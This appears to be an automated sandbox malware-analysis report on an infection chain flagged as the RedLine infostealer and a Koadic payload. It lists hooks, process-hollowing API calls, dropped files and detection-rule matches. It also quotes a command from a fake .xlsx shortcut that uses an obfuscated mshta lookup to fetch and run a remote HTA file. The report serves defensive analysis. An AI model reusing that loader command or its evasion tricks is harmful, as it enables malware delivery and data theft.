                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41D67A03 GetKeyState,GetKeyState,GetKeyState
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41D67A08 GetKeyState,GetKeyState,GetKeyState

                    System Summary

                    Source: amsi64_7800.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED | Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                    Source: Initial file | Strings: https://www.sessosesso.it/assets/aw/yt.htaAC:
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\uc.exe
                    Source: FT. 40FE CNY .xlsx.lnk | LNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0299C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0299C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0299C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0299C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_02997966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_02997F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028B7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028B7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFAAB970E65
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB955F80
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB9834B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95BC90
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95BC35
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95BB3B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95E318
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95BA99
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB95DFE0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB96CEA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAABA2362E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAABA232A0
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: 19_2_029820C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_004073A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_3D941030
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_3D941020
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B99A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B1220
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B1AF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411BCD30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B0ED8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B3EDF
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_411B3EF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41454570
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41450040
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_414560F0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41453370
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_4145F3D1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41459B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_4145ABB0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_4145D1A8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41453AB7
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41D65168
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_2_41D60990
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 23_1_004073A0
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: 24_2_028A20C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00408C60
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_0040DC11
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00407C3F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00418CCC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00406CA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_004028B0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_0041A4BE
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00418244
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00401650
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00402F20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_004193C4
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00418788
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00402F89
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_00402B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_004073A0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_25B81030
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_25B81020
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29439A58
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29431AF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29430ED8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29433EEC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29433EF0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29431220
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296DF3D1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296DABB0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296D9B90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296D4570
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296D0680
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296DD1A8
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_296D3AB7
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29CB15FC
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29CB15F0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29FE0990
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: 25_2_29FE5168
                    Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\bwsiuvcU.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                    Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: String function: 0040D606 appears 72 times
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Code function: String function: 0040E1D8 appears 132 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: String function: 028A6658 appears 32 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: String function: 028A4698 appears 156 times
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Code function: String function: 028A4824 appears 629 times
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: String function: 029844A0 appears 67 times
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: String function: 02986658 appears 32 times
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: String function: 02984824 appears 883 times
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: String function: 02997BE8 appears 45 times
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Code function: String function: 02984698 appears 247 times
                    Source: netutils.dll.19.dr | Static PE information: Number of sections : 19 > 10
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: amsi64_7800.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02987F90 GetDiskFreeSpaceA,19_2_02987F90
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02996D84 CoCreateInstance,19_2_02996D84
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].htaJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMutant created: NULL
